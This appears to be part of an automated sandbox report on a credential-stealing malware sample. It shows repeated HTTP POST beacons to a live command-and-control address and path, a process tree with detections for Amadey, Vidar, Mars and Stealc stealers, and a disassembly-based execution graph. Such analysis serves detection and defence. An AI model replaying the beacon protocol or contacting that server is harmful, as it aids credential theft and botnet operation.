                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:54.346827984 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:55.057070971 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:55.057758093 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:55.281194925 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.44979477.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:55.396119118 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:56.105695009 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:56.106391907 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:56.478682041 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.44979577.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:56.596945047 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:57.296521902 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:57.297256947 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:57.515573025 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.44979677.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:57.628777981 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:58.359369993 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:58.360021114 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:58.588716984 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.44979777.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:58.706305981 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:59.421289921 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:59.422738075 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:59.647420883 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.44979877.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:59.770379066 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:38:00.486498117 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:38:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:38:00.487190008 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:38:00.708609104 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:38:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:22:35:56
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x4b0000
                                                                File size:2'544'640 bytes
                                                                MD5 hash:5DF47A238D51FDAD9B442FEB6C833886
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:22:36:13
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:22:36:13
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:22:36:13
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:22:36:13
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:5
                                                                Start time:22:36:13
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
                                                                Imagebase:0xa10000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.1835353412.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.1883984397.0000000000A11000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 42%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:22:36:18
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                                                                Imagebase:0x190000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.1915365040.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.1875084748.0000000005230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 42%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:22:36:19
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0x190000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.1883081687.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.1923368430.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:22:37:00
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0x190000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000003.2284671985.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2879009091.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:0.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:30%
                                                                  Total number of Nodes:110
                                                                  Total number of Limit Nodes:12
                                                                  execution_graph 45789 6c60c930 GetSystemInfo VirtualAlloc 45790 6c60c9a3 GetSystemInfo 45789->45790 45791 6c60c973 45789->45791 45792 6c60c9d0 45790->45792 45793 6c60c9b6 45790->45793 45805 6c62b320 5 API calls ___raise_securityfailure 45791->45805 45792->45791 45796 6c60c9d8 VirtualAlloc 45792->45796 45793->45792 45795 6c60c9bd 45793->45795 45795->45791 45798 6c60c9c1 VirtualFree 45795->45798 45799 6c60c9f0 45796->45799 45800 6c60c9ec 45796->45800 45797 6c60c99b 45798->45791 45806 6c62cbe8 GetCurrentProcess TerminateProcess 45799->45806 45800->45791 45805->45797 45807 6c62b9c0 45808 6c62b9c9 45807->45808 45809 6c62b9ce dllmain_dispatch 45807->45809 45811 6c62bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 45808->45811 45811->45809 45812 6c62b694 45813 6c62b6a0 ___scrt_is_nonwritable_in_current_image 45812->45813 45842 6c62af2a 45813->45842 45815 6c62b6a7 45816 6c62b6d1 45815->45816 45817 6c62b796 45815->45817 45828 6c62b6ac ___scrt_is_nonwritable_in_current_image 45815->45828 45846 6c62b064 45816->45846 45859 6c62b1f7 IsProcessorFeaturePresent 45817->45859 45820 6c62b6e0 __RTC_Initialize 45820->45828 45849 6c62bf89 InitializeSListHead 45820->45849 45821 6c62b7b3 ___scrt_uninitialize_crt __RTC_Initialize 45822 6c62b79d ___scrt_is_nonwritable_in_current_image 45822->45821 45826 6c62b7d2 45822->45826 45827 6c62b828 45822->45827 45824 6c62b6ee ___scrt_initialize_default_local_stdio_options 45825 6c62b6f3 _initterm_e 45824->45825 45825->45828 45829 6c62b708 45825->45829 45863 6c62b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 45826->45863 45830 6c62b1f7 ___scrt_fastfail 6 API calls 45827->45830 45850 6c62b072 45829->45850 45834 6c62b82f 45830->45834 45832 6c62b7d7 45864 6c62bf95 __std_type_info_destroy_list 45832->45864 45838 6c62b83b 45834->45838 45839 6c62b86e dllmain_crt_process_detach 45834->45839 45836 6c62b70d 45836->45828 45837 6c62b711 _initterm 45836->45837 45837->45828 45840 6c62b860 dllmain_crt_process_attach 45838->45840 45841 6c62b840 45838->45841 45839->45841 45840->45841 45843 6c62af33 45842->45843 45865 6c62b341 IsProcessorFeaturePresent 45843->45865 45845 6c62af3f ___scrt_uninitialize_crt 45845->45815 45866 6c62af8b 45846->45866 45848 6c62b06b 45848->45820 45849->45824 45851 6c62b077 ___scrt_release_startup_lock 45850->45851 45852 6c62b082 45851->45852 45853 6c62b07b 45851->45853 45856 6c62b087 _configure_narrow_argv 45852->45856 45876 6c62b341 IsProcessorFeaturePresent 45853->45876 45855 6c62b080 45855->45836 45857 6c62b092 45856->45857 45858 6c62b095 _initialize_narrow_environment 45856->45858 45857->45836 45858->45855 45860 6c62b20c ___scrt_fastfail 45859->45860 45861 6c62b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 45860->45861 45862 6c62b302 ___scrt_fastfail 45861->45862 45862->45822 45863->45832 45864->45821 45865->45845 45867 6c62af9a 45866->45867 45868 6c62af9e 45866->45868 45867->45848 45869 6c62b028 45868->45869 45872 6c62afab ___scrt_release_startup_lock 45868->45872 45870 6c62b1f7 ___scrt_fastfail 6 API calls 45869->45870 45871 6c62b02f 45870->45871 45873 6c62afb8 _initialize_onexit_table 45872->45873 45874 6c62afd6 45872->45874 45873->45874 45875 6c62afc7 _initialize_onexit_table 45873->45875 45874->45848 45875->45874 45876->45855 45877 843b8c 45879 843b99 VirtualAlloc 45877->45879 45880 6c62b8ae 45883 6c62b8ba ___scrt_is_nonwritable_in_current_image 45880->45883 45881 6c62b8c9 45882 6c62b8e3 dllmain_raw 45882->45881 45885 6c62b8fd dllmain_crt_dispatch 45882->45885 45883->45881 45883->45882 45884 6c62b8de 45883->45884 45893 6c60bed0 DisableThreadLibraryCalls LoadLibraryExW 45884->45893 45885->45881 45885->45884 45887 6c62b91e 45889 6c62b94a 45887->45889 45894 6c60bed0 DisableThreadLibraryCalls LoadLibraryExW 45887->45894 45888 6c62b953 dllmain_crt_dispatch 45888->45881 45890 6c62b966 dllmain_raw 45888->45890 45889->45881 45889->45888 45890->45881 45892 6c62b936 dllmain_crt_dispatch dllmain_raw 45892->45889 45893->45887 45894->45892 45895 6c5f35a0 45896 6c5f35c4 InitializeCriticalSectionAndSpinCount getenv 45895->45896 45911 6c5f3846 __aulldiv 45895->45911 45898 6c5f38fc strcmp 45896->45898 45908 6c5f35f3 __aulldiv 45896->45908 45900 6c5f3912 strcmp 45898->45900 45898->45908 45899 6c5f38f4 45900->45908 45901 6c5f35f8 QueryPerformanceFrequency 45901->45908 45902 6c5f3622 _strnicmp 45904 6c5f3944 _strnicmp 45902->45904 45902->45908 45903 6c5f376a QueryPerformanceCounter EnterCriticalSection 45905 6c5f37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 45903->45905 45909 6c5f375c 45903->45909 45906 6c5f395d 45904->45906 45904->45908 45905->45909 45910 6c5f37fc LeaveCriticalSection 45905->45910 45907 6c5f3664 GetSystemTimeAdjustment 45907->45908 45908->45901 45908->45902 45908->45904 45908->45906 45908->45907 45908->45909 45909->45903 45909->45905 45909->45910 45909->45911 45910->45909 45910->45911 45912 6c62b320 5 API calls ___raise_securityfailure 45911->45912 45912->45899 45913 6c5f3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 45918 6c62ab2a 45913->45918 45917 6c5f30db 45922 6c62ae0c _crt_atexit _register_onexit_function 45918->45922 45920 6c5f30cd 45921 6c62b320 5 API calls ___raise_securityfailure 45920->45921 45921->45917 45922->45920

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67F688,00001000), ref: 6C5F35D5
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5F35E0
                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C5F35FD
                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5F363F
                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5F369F
